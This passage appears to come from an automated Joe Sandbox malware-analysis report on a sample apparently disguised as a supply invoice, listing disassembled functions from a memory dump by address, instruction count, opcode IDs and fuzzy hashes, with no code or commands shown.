                                                                                                                                • Instruction Fuzzy Hash: 44714F70900205EFDB20DF69D984B9BFBF9FF94710B10815EF616AB29AD7319A80CB54
                                                                                                                                Function 0171260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                                • Instruction ID: 99d1bedf9b3c4163c0eeb06cf2159b00ecc631b9ca2105e5542decf5b76baff8
                                                                                                                                • Opcode Fuzzy Hash: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                                • Instruction Fuzzy Hash: B371CF316042428FD312DF2CC484B6AF7E5FF84710F1489AAE899CB79ADB34D946CB91
                                                                                                                                Function 0178035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                • Instruction ID: bd5cfff25251d3f4a39021122cf67e17fad37dda0e4090d1e5600d1f5578f8ba
                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                • Instruction Fuzzy Hash: F5716E71E40619AFDB10EFA9C944E9EFBB9FF48710F104569E505A7254DB30EA05CBA0
                                                                                                                                Function 017962A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
                                                                                                                                • Instruction ID: 808e3dd7e367092b75551fb922a73e1b381ceb74b1a4bd8a668750aad2398f97
                                                                                                                                • Opcode Fuzzy Hash: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
                                                                                                                                • Instruction Fuzzy Hash: C471F332240B01AFEB32DF58D844F5AFBA6EF44760F154A28F2558B2A1D775E948CB50
                                                                                                                                Function 01708AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
                                                                                                                                • Instruction ID: 2077be0d47647c9a82108629f37936c71c968d25ce82f686d2d34bb8d17a4893
                                                                                                                                • Opcode Fuzzy Hash: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
                                                                                                                                • Instruction Fuzzy Hash: 9F818D72A08706CFDB25CF9CD488BAEF7F5AB48320F1A416DD905AB286D7749D40CB94
                                                                                                                                Function 017D8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
                                                                                                                                • Instruction ID: 95d3018e74ff904fd6dce169ce5007e426582a79b2bceaf0da9de32df5791529
                                                                                                                                • Opcode Fuzzy Hash: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
                                                                                                                                • Instruction Fuzzy Hash: 88712971E0020AAFDF16DF94C845FEEFBB8FB04350F104269F625A6294E774AA05CB91
                                                                                                                                Function 017BA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
                                                                                                                                • Instruction ID: a5e4007127f5d78264ed5d88bc312fa93305c11660183544246550d144a91eae
                                                                                                                                • Opcode Fuzzy Hash: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
                                                                                                                                • Instruction Fuzzy Hash: 3F51B072504712AFD722EE68C888F9BFBE8EBC5750F010929BA41DB254D774ED05C7A2
                                                                                                                                Function 017A8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
                                                                                                                                • Instruction ID: f55a6b2ece97e0c5e702a7677af9c9b68bf640020e86cfd6cea01798277412f7
                                                                                                                                • Opcode Fuzzy Hash: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
                                                                                                                                • Instruction Fuzzy Hash: 8851DF70900705DFD721CFAAC884AABFBF8BF94710F50471EE292976A1D7B0A545CB91
                                                                                                                                Function 0173E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
                                                                                                                                • Instruction ID: f3e8e62940a83250cb001971d7d65735ecdac0d0d02cdd1b8e9a6c4c22780ba4
                                                                                                                                • Opcode Fuzzy Hash: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
                                                                                                                                • Instruction Fuzzy Hash: 78518E71200A05DFCB22EF69C984E6AF3F9FF58764F500869E652972A5EB30ED50CB50
                                                                                                                                Function 017A4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
                                                                                                                                • Instruction ID: 5e3c645021e5f4a388a7f6ba93a7538779f0becc4c385aa720ba93a3ea6c144e
                                                                                                                                • Opcode Fuzzy Hash: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
                                                                                                                                • Instruction Fuzzy Hash: 715178716083429FD754DF29C880A6BFBE5BFC8204F884A2DF58AD7250EB71D905CB52
                                                                                                                                Function 017245B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction ID: 15d9036c8e9e1283e41b0ac916d65212cfdb873b8b9646d4d0eab5d018269d02
                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction Fuzzy Hash: F0518E71E0022AABDF15DF98C444BEEFBB9AF45754F044069EA12AB340D774DE46CBA0
                                                                                                                                Function 0178E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction ID: c2da005217fa9d870a930ee6ab29c444a61e2cb4ff2c81ca40208f19ca2db028
                                                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction Fuzzy Hash: 9A51A571D4021AEFEF21BA94C894FAEFFB5AB00724F154665E912A7190DB309E408BA1
                                                                                                                                Function 017C8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fd74dbe4085ad589ca66ca1e99db9ec6e7edd4b482a8e1533fc45d2607ffbfed
                                                                                                                                • Instruction ID: d6d5284e08e388793c2ae7d78ff5cc0ff3b8fbf5ceeabe8def892b165331099f
                                                                                                                                • Opcode Fuzzy Hash: fd74dbe4085ad589ca66ca1e99db9ec6e7edd4b482a8e1533fc45d2607ffbfed
                                                                                                                                • Instruction Fuzzy Hash: 2541D3707016119BDB29DF2DC894B7BFB9AEF90B20F08826DE95587385DB34D841C792
                                                                                                                                Function 0178CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1bcae392893c6744df3367b4419753cda141617796c9a980009e10a40c472c20
                                                                                                                                • Instruction ID: 1ea5c0bada9107cbc744137770fe2095acf14d0861999b8fce1355d42b4492aa
                                                                                                                                • Opcode Fuzzy Hash: 1bcae392893c6744df3367b4419753cda141617796c9a980009e10a40c472c20
                                                                                                                                • Instruction Fuzzy Hash: 67517D71940216DFCB21EFA9C98499EFBF9FB48364B118559E545A3305D730AD41CFA0
                                                                                                                                Function 0173A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c86cd48d8ea1dc1793cde36ae9d0dfbc678ca3eb3aa488173b2a3baa13acb51c
                                                                                                                                • Instruction ID: 929ccfc7fed1bf2dbc10903a6f291fc444866888454a5de272b835443dd450bb
                                                                                                                                • Opcode Fuzzy Hash: c86cd48d8ea1dc1793cde36ae9d0dfbc678ca3eb3aa488173b2a3baa13acb51c
                                                                                                                                • Instruction Fuzzy Hash: 9B4125756482019BDF25EF6C9886F2BF765AB94318F40402DFF42DB24BDB7298008B50
                                                                                                                                Function 017CA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                • Instruction ID: 3d69f916b2ffd5a001b700e8a8ab1e44070176bb927c35d2d8c4f79d81335abc
                                                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                • Instruction Fuzzy Hash: C241E471A0171A9FCB25CF2CC984A6EF7A9FF80711B04466EEA1287644FB30EE04C790
                                                                                                                                Function 017301F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cff1fafbb2b6262fc7c608b722e0fdcaa2a20797f5edb5d7e162de4d44b416ac
                                                                                                                                • Instruction ID: 592fc6a2806f31590202d160ad7505dee31c213440b6bfbefda281c554f239aa
                                                                                                                                • Opcode Fuzzy Hash: cff1fafbb2b6262fc7c608b722e0fdcaa2a20797f5edb5d7e162de4d44b416ac
                                                                                                                                • Instruction Fuzzy Hash: B341BC76900219DBDB14DF98C440AEEFBB5BF88710F15816EF815E7242D7359D41CBA4
                                                                                                                                Function 0172EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2cb4df9de518a554208e65ae46f50680bc87d8d798fa9db6b5e04f3c41ef9879
                                                                                                                                • Instruction ID: 42eab67ea0241ea663dab15fdcd66db2e2ad1f72fbce5d19c1fadb7932859f89
                                                                                                                                • Opcode Fuzzy Hash: 2cb4df9de518a554208e65ae46f50680bc87d8d798fa9db6b5e04f3c41ef9879
                                                                                                                                • Instruction Fuzzy Hash: BD41E0712043029FD724DF68C894A6BF7F9FF98224F10486EE957C721AEB30E8858B51
                                                                                                                                Function 01742750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                • Instruction ID: b16a27edc2de45e5849bc1542899308315e3fded781d949c14cd95511e00f570
                                                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                • Instruction Fuzzy Hash: 9E515B75A00219DFEB15CF9CC480AAEF7B2FF84710F2881A9D915A7355D771AE82CB90
                                                                                                                                Function 01706154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 304aaad47853366c808ab8b0091f952d5fd939299fbf6f050b488d1ca23c9880
                                                                                                                                • Instruction ID: 2f4f48c969f7da1a85577c645d8b94351aea3deb2477f40ada7d023a2d5a154b
                                                                                                                                • Opcode Fuzzy Hash: 304aaad47853366c808ab8b0091f952d5fd939299fbf6f050b488d1ca23c9880
                                                                                                                                • Instruction Fuzzy Hash: A9510770944207DBDB269B28CC14BE9FBF5EF15314F1482A9F515A72C6D7349991CF40
                                                                                                                                Function 01700BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b669442cab7b3c4ced815726c914ea6829e2dd5980536c27e36a935212f710a9
                                                                                                                                • Instruction ID: 5620a4775f7f90f4d69c3c85987f42a0d148247d80775bd1c3499b5458a28416
                                                                                                                                • Opcode Fuzzy Hash: b669442cab7b3c4ced815726c914ea6829e2dd5980536c27e36a935212f710a9
                                                                                                                                • Instruction Fuzzy Hash: 5A418135A00329DBDB62DF6CC944BEEF7B4EF45750F0100A5E909AB285DB749E84CB91
                                                                                                                                Function 017C866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                • Instruction ID: 91a919ff98ec1fe4ea28c9ea15694e488174c5ed2179689065058b64215f3de2
                                                                                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                • Instruction Fuzzy Hash: 0A418275B10205ABEB15DF99CC84AAFFBBAAF88B10F14406DE905A7346DB70DD0187A1
                                                                                                                                Function 01700887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2c9ff779b95b162d596395160e79409c4712d32473fee93b871e31b31a695463
                                                                                                                                • Instruction ID: e265ebd012e02c10802f4760ab1c6e04e5313c8c16d61068b9de681e617e0be1
                                                                                                                                • Opcode Fuzzy Hash: 2c9ff779b95b162d596395160e79409c4712d32473fee93b871e31b31a695463
                                                                                                                                • Instruction Fuzzy Hash: F741B0B0610701DFE326CF28C480A22F7F9FF49364B208A6EE54786A91E730E945CB90
                                                                                                                                Function 0172A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b3b1e391406678e44e46eb85d650f85d45fe7a10628ccc28712a0609187fd565
                                                                                                                                • Instruction ID: 22a69de63cf084b10996ad514bb086b646eb2ca9d919438d93ef7dcb721e2be2
                                                                                                                                • Opcode Fuzzy Hash: b3b1e391406678e44e46eb85d650f85d45fe7a10628ccc28712a0609187fd565
                                                                                                                                • Instruction Fuzzy Hash: 8141E131944225CFDB25DF6CC894BAFFBB4FB18320F284199D412AB699DB34D941CBA0
                                                                                                                                Function 01708BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc8a448e30f732d6d821ce4b23eddc86695c8a61fc96c0e99830fdeeffa67007
                                                                                                                                • Instruction ID: 7f13eeb1e3c99444224a2fa5f83528c8beafeffe246538c23cdb3bc658565840
                                                                                                                                • Opcode Fuzzy Hash: cc8a448e30f732d6d821ce4b23eddc86695c8a61fc96c0e99830fdeeffa67007
                                                                                                                                • Instruction Fuzzy Hash: 28411371E00302CBD7269F58C884A6BFBF5FB98714F18816ED9069B29AC775D842CF91
                                                                                                                                Function 016F8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 63e0d673d0ba635a7fbab8524d19a38297a243c02c344d933b70171899839f2e
                                                                                                                                • Instruction ID: 60abe40a9f2e88300a9c7cc2d86cd03f0d908ee7709cf7bf30d3189a065c6198
                                                                                                                                • Opcode Fuzzy Hash: 63e0d673d0ba635a7fbab8524d19a38297a243c02c344d933b70171899839f2e
                                                                                                                                • Instruction Fuzzy Hash: 9D4148315083569ED312DF69C840A6BF7E9EF88B54F40096EFA94D7250E770DE058BA3
                                                                                                                                Function 016FA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                • Instruction ID: 54129f60a41e852bbda44821b036c2cdccc95cce803d2a840ace0630cafec71e
                                                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                • Instruction Fuzzy Hash: 82413B31A00211EBDB51DEA898407BAFB73EB50759F15806EEE498B280D7768D41CB90
                                                                                                                                Function 017009AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5c4c796fc33549d8a875d490f81ffbfca8cceb85695ed0f3f2fccb57d5dad4dd
                                                                                                                                • Instruction ID: 5152e729e93c0fcea7f4ce654d6b3fa2fe17ebaf1ecf8ecf86ba1b026262a3ff
                                                                                                                                • Opcode Fuzzy Hash: 5c4c796fc33549d8a875d490f81ffbfca8cceb85695ed0f3f2fccb57d5dad4dd
                                                                                                                                • Instruction Fuzzy Hash: BC415AB1640701EFD722CF18C844B26FBE5FF58364F24866AE4498B291E771EA41CB90
                                                                                                                                Function 01730710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                • Instruction ID: f4522b704db7af58f511133d8ad503ba2a1cf65585b23bc192468f7ac032465e
